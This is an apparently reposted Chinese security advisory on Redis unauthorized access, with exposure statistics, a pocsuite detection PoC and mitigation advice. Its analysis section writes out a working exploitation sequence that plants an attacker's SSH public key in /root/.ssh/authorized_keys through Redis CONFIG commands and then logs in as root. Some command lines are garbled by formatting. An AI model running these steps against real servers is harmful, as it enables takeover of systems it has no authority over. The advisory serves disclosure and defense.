Redis 未授权访问缺陷可轻易导致系统被黑



Sebug 公布了 Redis 未授权访问缺陷的详细漏洞信息,这个 Redis 未授权访问缺陷可轻易导致系统被黑。详细内容请看下文:

漏洞概要

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。

漏洞概述

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。

漏洞描述

Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的” 。

Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99%使用Redis的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。

因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因,部分Redis绑定在0.0.0.0:6379,并且没有开启认证(这是Redis的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,将会导致Redis服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。

利用Redis自身的相关方法,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。

漏洞影响

Redis 暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且没有开启相关认证和添加相关安全策略情况下可受影响而导致被利用。

通过ZoomEye 的搜索结果显示,有97700在公网可以直接访问的Redis服务。


根据 ZoomEye 最新于2015年11月12日0点探测结果显示:

总的存在无验证可直接利用 Redis 服务的目标全球有49099,其中中国有16477。其中被明着写入crackit的,也就是已经被黑的比例分别是全球65%(3.1万),中国67.5%(1.1万)。

1.1.    漏洞分析与利用

首先在本地生产公私钥文件:

1
$ ssh -keygen –t rsa


然后将公钥写入foo.txt文件

1
$ ( echo  -e  "nn" cat  id_rsa.pub;  echo  -e  "nn" ) > foo.txt

再连接Redis写入文件

1
2
3
4
5
6
cat  foo.txt | redis-cli -h 192.168.1.11 -x  set  crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config  set  dir  /Users/antirez/ . ssh /OK
$ 192.168.1.11:6379> config get dir1)  "dir" 2)  "/root/.ssh"
$ 192.168.1.11:6379> config  set  dbfilename  "authorized_keys" OK
$ 192.168.1.11:6379> saveOK


这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authotrized_keys文件里,然后攻击者直接执行:

1
ssh  –i  id_rsa root@192.168.1.11

即可远程利用自己的私钥登录该服务器。

当然,写入的目录不限于/root/.ssh 下的authorized_keys,也可以写入用户目录,不过Redis很多以root权限运行,所以写入root目录下,可以跳过猜用户的步骤。

Redis 未授权的其他危害与利用

数据库数据泄露

Redis 作为数据库,保存着各种各样的数据,如果存在未授权访问的情况,将会导致数据的泄露,其中包含保存的用户信息等

代码执行

Redis可以嵌套Lua脚本的特性将会导致代码执行, 危害同其他服务器端的代码执行, 样例如下


一旦攻击者能够在服务器端执行任意代码, 攻击方式将会变得多且复杂, 这是非常危险的.

通过Lua代码攻击者可以调用 redis.sha1hex() 函数,恶意利用 Redis 服务器进行 SHA-1 的破解。

敏感信息泄露

通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫


可以看到泄露了很多 Redis 服务器的信息, 有当前 Redis 版本, 内存运行状态, 服务端个数等等敏感信息。

全球无验证可直接利用 Redis 分布情况


全球无验证可直接利用 Redis TOP 10 国家与地区


漏洞 PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import  socket
import  urlparse
from  pocsuite.poc  import  POCBase, Output
from  pocsuite.utils  import  register
class  TestPOC(POCBase):
     vulID  =  '89339'
     version  =  '1'
     author  =  [ 'Anonymous' ]
     vulDate  =  '2015-10-26'
     createDate  =  '2015-10-26'
     updateDate  =  '2015-10-26'
     references  =  [ 'http://sebug.net/vuldb/ssvid-89339' ]
     name  =  'Redis 未授权访问 PoC'
     appPowerLink  =  'http://redis.io/'
     appName  =  'Redis'
     appVersion  =  'All'
     vulType  =  'Unauthorized access'
     desc  =  '''
         redis 默认不需要密码即可访问,黑客直接访问即可获取数据库中所有信息,造成严重的信息泄露。
     '''
     samples  =  ['']
     def  _verify( self ):
         result  =  {}
         payload  =  'x2ax31x0dx0ax24x34x0dx0ax69x6ex66x6fx0dx0a'
         =  socket.socket()
         socket.setdefaulttimeout( 10 )
         try :
             host  =  urlparse.urlparse( self .url).netloc
             port  =  6379
             s.connect((host, port))
             s.send(payload)
             recvdata  =  s.recv( 1024 )
             if  recvdata  and  'redis_version'  in  recvdata:
                 result[ 'VerifyInfo' =  {}
                 result[ 'VerifyInfo' ][ 'URL' =  self .url
                 result[ 'VerifyInfo' ][ 'Port' =  port
         except :
             pass
         s.close()
         return  self .parse_attack(result)
     def  _attack( self ):
         return  self ._verify()
     def  parse_attack( self , result):
         output  =  Output( self )
         if  result:
             output.success(result)
         else :
             output.fail( 'Internet nothing returned' )
         return  output
register(TestPOC)

解决方案

临时解决方案

  1. 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
  2. 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
  3. 配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
  4. 好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如config

官方解决方案

暂无官方解决方案

推荐防护方案

暂无防护方案

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值